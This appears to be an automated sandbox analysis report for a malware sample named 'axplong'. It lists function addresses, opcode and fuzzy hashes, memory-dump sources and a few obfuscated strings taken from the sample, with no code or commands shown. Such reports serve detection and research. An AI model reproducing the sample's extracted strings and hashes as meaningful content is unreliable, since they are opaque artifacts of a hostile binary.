Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e156b196cb7217bbbfe01aff0dd4f20d723a8d97b91953cb0521d6cee8698209
Instruction ID: db7313c5a4c1b1eaa712bfcaa252eb35f054b845e7cc896bae6b8d5f5b5924c5
Opcode Fuzzy Hash: e156b196cb7217bbbfe01aff0dd4f20d723a8d97b91953cb0521d6cee8698209
Instruction Fuzzy Hash: 2611D0FB24C114BD7241A5852B109FB67ADEBD7730372882FF403CA606EB941A8E7471

Function 04F80819 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f73279a532cff8cf2a55afc5dea86f443f60a466a666284c8f91697e4e51e2ca
Instruction ID: f35ac2955321aa147e6561fcbbd66e5d5b6a065222cb44ce76d18d4a71c44922
Opcode Fuzzy Hash: f73279a532cff8cf2a55afc5dea86f443f60a466a666284c8f91697e4e51e2ca
Instruction Fuzzy Hash: 80018FEB24C224BC7141A5423B109FB6BAED6D7730372882FF447C6506EB991A8E3072

Function 04F80828 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449253b91d79e240314f601fad8a3178f7d3f907f9eee4648098b72a851b9b20
Instruction ID: 7f04a8f801b2da043593df1a0e17e023ae4220127f1bada5c6da49e37bad99b1
Opcode Fuzzy Hash: 449253b91d79e240314f601fad8a3178f7d3f907f9eee4648098b72a851b9b20
Instruction Fuzzy Hash: E3F081EB24C124BC7141A0423F109FB6BADD6D6730372882FF403C5507DB991A8E3032

Function 04F80841 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9319cb5d983ef20901c0112097f9075ec1deb78fa799d680b4acdf4f5b6109bc
Instruction ID: 5b415bae353eee5658ebb78cba949cd2b148f25abaf67efabc477eb95b64de1d
Opcode Fuzzy Hash: 9319cb5d983ef20901c0112097f9075ec1deb78fa799d680b4acdf4f5b6109bc
Instruction Fuzzy Hash: 1A01ADEB64C2A06DB24190523B249FB6B6DD5E3730332882FF442C6507D6890A8E6132

Non-executed Functions

Function 00BEE440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON

Download Yara Rule

Strings

WGt=, xrefs: 00BEF62D, 00BEF90A
WWp=, xrefs: 00BF04DA
111, xrefs: 00BEF6B0
#, xrefs: 00BF0534
UD==, xrefs: 00BEEA1F, 00BEEC66
246122658369, xrefs: 00BEF647, 00BEF924, 00BF04F7, 00BF08AA
MT==, xrefs: 00BEE4A5
GqKudSO2, xrefs: 00BEE47F
fed3aa, xrefs: 00BEFA9E
MJB+, xrefs: 00BEE734
WWt=, xrefs: 00BF088D

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: 01ff01a8fa2f504e08abec200c1a66a5ea83778b20efc67a7534f82cea733075
Instruction ID: 6d83170205760e15d867b3cb73f512ed0511ebd7dc1fe65e493462ff33f9fbcf
Opcode Fuzzy Hash: 01ff01a8fa2f504e08abec200c1a66a5ea83778b20efc67a7534f82cea733075
Instruction Fuzzy Hash: 4682C170A0428CDBEF14EF68C9497ED7BF6AB46304F5081D8E815673C2D7759A88CB92

Function 00C23068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00C231E3

Strings

1#INF, xrefs: 00C2439E
1#QNAN, xrefs: 00C24381
1#SNAN, xrefs: 00C2437A
1#IND, xrefs: 00C24373

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 2e0f1c02fa5c724c8422cbf27484b8712d63bbb58a1bcc9ce26ef3265e87836b
Instruction ID: e8568bb739af4f8a6401b7304faa4e976b0852bf589dd65257de013edc62f74d
Opcode Fuzzy Hash: 2e0f1c02fa5c724c8422cbf27484b8712d63bbb58a1bcc9ce26ef3265e87836b
Instruction Fuzzy Hash: CBC22971E086788FDB25CE28ED407E9B7B5EB88305F1441EAD85DA7640E778AF858F40

Function 00C22BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 41e92c2bdb1d2e9fe1c16d0fc7613621d1926b64c2b3e04bc8a873a91329df17
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 78F14071E002299FDF14CFA8D9806AEF7B1FF48314F158269E929AB744D731AE41CB90

Function 00BFCB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00BFCE82,?,?,?,?,00BFCEB7,?,?,?,?,?,?,00BFC42D,?,00000001), ref: 00BFCB33

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: b7d68cf7ca7eb19d67c2bb122fe870b3db3ee797be1d496eaa8cfc662f02c623
Instruction ID: 0668fe4b5a3fe1f2aae9d4b0fa09339fe85c227e0c3fd0a33597ac877d237184
Opcode Fuzzy Hash: b7d68cf7ca7eb19d67c2bb122fe870b3db3ee797be1d496eaa8cfc662f02c623
Instruction Fuzzy Hash: 1ED0223650203C97CA053B90AC06ABDBF589A45B103000151EE09672218E116C924BD0

Function 00C17D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00C17EFF

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 011af5ef6701027ab9d59b5bfde494aac0e71e81fa013c2a3fb64b109503bcd3
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: DD51667020C60C5EDF389A6889967FE67FA9F13300F240799D462D76C2DA119FC9B351

Function 00BE4CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab90f3aab2689d9dd8254b068a8d534b65494dcac8231fbebffc1d5ed1fb69b3
Instruction ID: 78f0a16c3a1c1d326c1beae038a82a3d52220af302f8589fc9dd0badd52127e3
Opcode Fuzzy Hash: ab90f3aab2689d9dd8254b068a8d534b65494dcac8231fbebffc1d5ed1fb69b3
Instruction Fuzzy Hash: B3225FB7F515144BDB0CCA9DDCA27EDB2E3BFD8214B0E803DA40AE3345EA79D9158A44

Function 00C26F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0a0f17b03a3bd2a58bbf6da24dcf2f053807b09f4e6195d82a41b225be9ea4
Instruction ID: 282028a9a610f0394ffe93aeda1aed53867ac98f5c376725775b5bd1b379de19
Opcode Fuzzy Hash: 1b0a0f17b03a3bd2a58bbf6da24dcf2f053807b09f4e6195d82a41b225be9ea4
Instruction Fuzzy Hash: 34B18E31214619CFDB14CF28D4C6B697BE0FF45364F258658E8A9CF6A1C335EA91CB40

Function 00BFD312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00BE247E

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: c27ae329c4271a64f906142871c67868eb5bcd2c1c7a7bf39e0dc88a85d18c38
Instruction ID: f3dca7665d36d0b970a8b51df6288859042b7d669b659fb18144e702e0b2fb72
Opcode Fuzzy Hash: c27ae329c4271a64f906142871c67868eb5bcd2c1c7a7bf39e0dc88a85d18c38
Instruction Fuzzy Hash: 6551BEB5A006098FDB15CF58D8817BEB7F6FB08310F2485AAD504EB291D7749D49DF50

Function 00BE4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789cf6c67e5c24688ea9fdd2bf49af5935245262f22d7fd26cc759839714f74e
Instruction ID: 084e9fbb5fc5a9cb1b3b47e7b353d28dd0b584f9b026ea2db6b627eaf0bb14d1
Opcode Fuzzy Hash: 789cf6c67e5c24688ea9fdd2bf49af5935245262f22d7fd26cc759839714f74e
Instruction Fuzzy Hash: 6951BF706187D18FC319CF29811523ABFE1EF99200F084A9EE5D687292D774DA48CBE2

Function 00C38D70 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a1c9227e5949b5d02aad9cd65211c58a387573f97ae993172d343ea5ef66d1c
Instruction ID: 42006c9d3c1fb9a3b3df4df77071adf92d2e10a60b1c8ce1d5f8bf33655e9e96
Opcode Fuzzy Hash: 1a1c9227e5949b5d02aad9cd65211c58a387573f97ae993172d343ea5ef66d1c
Instruction Fuzzy Hash: 5E41AB6685E3D14EC7038734493A0927FB06E23204B1E49DFD4C2DB0F3D699A91AE367

Function 00C2777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e854ffd13d4a24163ab36c7f3212731d8809caea00c874b466e932a26d87f59e
Instruction ID: 2b3aca3a78cf1dba14edbf485584178daae848da92f82d636fd6081ae5bd98eb
Opcode Fuzzy Hash: e854ffd13d4a24163ab36c7f3212731d8809caea00c874b466e932a26d87f59e
Instruction Fuzzy Hash: F821B673F204394B770CC47E8C5727DB6E1C68C541745423AE8A6EA2C1D968D917E2E4

Function 00C2765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35fdae09b4ef929aa6c5a9d30afe7b215efd2b7ef828ef7ad7d23a8262dfd21f
Instruction ID: 4ddc69827f6f09fe25f8098b289862524a3940928b6f69a3e588a1c47118f22a
Opcode Fuzzy Hash: 35fdae09b4ef929aa6c5a9d30afe7b215efd2b7ef828ef7ad7d23a8262dfd21f
Instruction Fuzzy Hash: 40117723F30C255B675C816D8C1727AA5D2EBD825071F533AD826E7284E9A4DE23D290

Function 00C28720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
